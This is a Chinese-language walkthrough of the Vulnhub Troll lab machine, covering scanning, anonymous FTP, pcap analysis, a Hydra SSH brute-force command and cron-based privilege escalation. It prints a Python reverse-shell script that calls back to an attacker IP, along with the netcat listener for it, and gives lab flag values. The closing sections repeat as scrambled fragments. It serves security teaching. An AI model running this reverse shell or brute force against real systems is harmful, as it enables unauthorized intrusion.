Vulnhub Troll靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 主机发现与端口扫描<\/h3>

使用Nmap进行全端口扫描：<\/p>

nmap -sC -sV 192.168.8.104 -p- --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口：

21\/tcp: FTP (vsftpd 3.0.2)<\/li>
22\/tcp: SSH (OpenSSH 6.6.1p1 Ubuntu)<\/li>
80\/tcp: HTTP (Apache 2.4.7)<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 服务详情分析<\/h3>
FTP服务分析<\/h4>

允许匿名登录(FTP code 230)<\/li>
可写文件：lol.pcap<\/code> (权限777)<\/li>
服务器信息：vsFTPd 3.0.2<\/li>
<\/ul>
HTTP服务分析<\/h4>

robots.txt中有一个禁止目录：\/secret<\/code><\/li>
网站标题为空<\/li>
发现隐藏目录：\/sup3rs3cr3tdirlol\/<\/code><\/li>
<\/ul>
2. 渗透测试过程<\/h2>
2.1 FTP匿名登录<\/h3>
ftp 192.168.8.104
<\/span><\/span># 用户名输入anonymous，密码可为空<\/span>
<\/span><\/span><\/code><\/pre>下载发现的pcap文件：<\/p>
get lol.pcap
<\/span><\/span><\/code><\/pre>2.2 分析pcap文件<\/h3>
使用Wireshark分析lol.pcap<\/code>文件：<\/p>

发现HTTP流量<\/li>
追踪TCP流发现提示信息：
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
<\/code><\/pre>
<\/li>
发现隐藏路径：http:\/\/192.168.8.104\/sup3rs3cr3tdirlol\/<\/code><\/li>
<\/ol>
2.3 Web目录枚举<\/h3>
访问发现的隐藏目录：<\/p>
curl http:\/\/192.168.8.104\/sup3rs3cr3tdirlol\/
<\/span><\/span><\/code><\/pre>发现可能包含用户名和密码的文件<\/p>
2.4 SSH爆破尝试<\/h3>
使用Hydra进行SSH爆破：<\/p>
hydra -s 22<\/span> -v -V -L user.txt -p "Good_job_:)"<\/span> -e n -t 1<\/span> -w 30<\/span> 192.168.8.104 ssh
<\/span><\/span><\/code><\/pre>注意：<\/p>

服务器会检测爆破行为并封禁IP<\/li>
测试发现密码不正确<\/li>
<\/ul>
尝试其他密码文件：<\/p>
ssh overflow@192.168.8.104
<\/span><\/span># 密码尝试：Pass.txt<\/span>
<\/span><\/span><\/code><\/pre>成功登录，但两分钟后会被自动踢下线<\/p>
2.5 本地信息收集<\/h3>
登录后查看本地文件：<\/p>
cat Local.txt
<\/span><\/span><\/code><\/pre>内容：d637cc968971b87d5b575ddfe2d50408<\/code><\/p>
3. 权限提升<\/h2>
3.1 查找定时任务<\/h3>
find \/ -name cleaner.py
<\/span><\/span><\/code><\/pre>发现路径：\/lib\/log\/cleaner.py<\/code><\/p>
3.2 分析定时任务脚本<\/h3>
查看脚本内容：<\/p>
ls -la \/lib\/log\/cleaner.py
<\/span><\/span>nano \/lib\/log\/cleaner.py
<\/span><\/span><\/code><\/pre>脚本内容：<\/p>
import<\/span> socket,<\/span>subprocess,<\/span>os;
<\/span><\/span>s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM);
<\/span><\/span>s.<\/span>connect(("192.168.8.107"<\/span>,10033<\/span>));
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),0<\/span>); 
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),1<\/span>);
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),2<\/span>);
<\/span><\/span>import<\/span> pty; 
<\/span><\/span>pty.<\/span>spawn("\/bin\/sh"<\/span>)
<\/span><\/span><\/code><\/pre>这是一个反向shell脚本，连接到攻击者的192.168.8.107主机的10033端口<\/p>
3.3 利用定时任务提权<\/h3>

在攻击机上设置监听：<\/li>
<\/ol>
nc -lvnp 10033<\/span>
<\/span><\/span><\/code><\/pre>
等待定时任务执行（约两分钟）后获得root shell<\/li>
<\/ol>
3.4 获取root flag<\/h3>
cat \/root\/Proot
<\/span><\/span><\/code><\/pre>内容：76535a590a2cd3cc48faa472c3831914<\/code><\/p>
4. 关键点总结<\/h2>

FTP匿名登录<\/strong>：vsftpd允许匿名访问，发现关键pcap文件<\/li>
网络流量分析<\/strong>：通过Wireshark分析pcap发现隐藏目录提示<\/li>
目录枚举<\/strong>：发现隐藏路径\/sup3rs3cr3tdirlol\/<\/code>获取凭据<\/li>
SSH登录<\/strong>：使用发现的凭据登录但会话有限制<\/li>
定时任务利用<\/strong>：发现并利用cleaner.py<\/code>脚本获取root权限<\/li>
<\/ol>
5. 防御建议<\/h2>

禁用FTP匿名登录<\/li>
限制敏感目录的web访问权限<\/li>
使用更复杂的SSH密码策略<\/li>
监控和限制定时任务的执行权限<\/li>
定期审计系统上的脚本和计划任务<\/li>
<\/ol>

Vulnhub Troll靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.2 服务详情分析<\/h3>

2. 渗透测试过程<\/h2>

5. 防御建议<\/h2> 禁用FTP匿名登录<\/li> 限制敏感目录的web访问权限<\/li> 使用更复杂的SSH密码策略<\/li> 监控和限制定时任务的执行权限<\/li> 定期审计系统上的脚本和计划任务<\/li> <\/ol>

5. 防御建议<\/h2>

禁用FTP匿名登录<\/li>
限制敏感目录的web访问权限<\/li>
使用更复杂的SSH密码策略<\/li>
监控和限制定时任务的执行权限<\/li>
定期审计系统上的脚本和计划任务<\/li> <\/ol>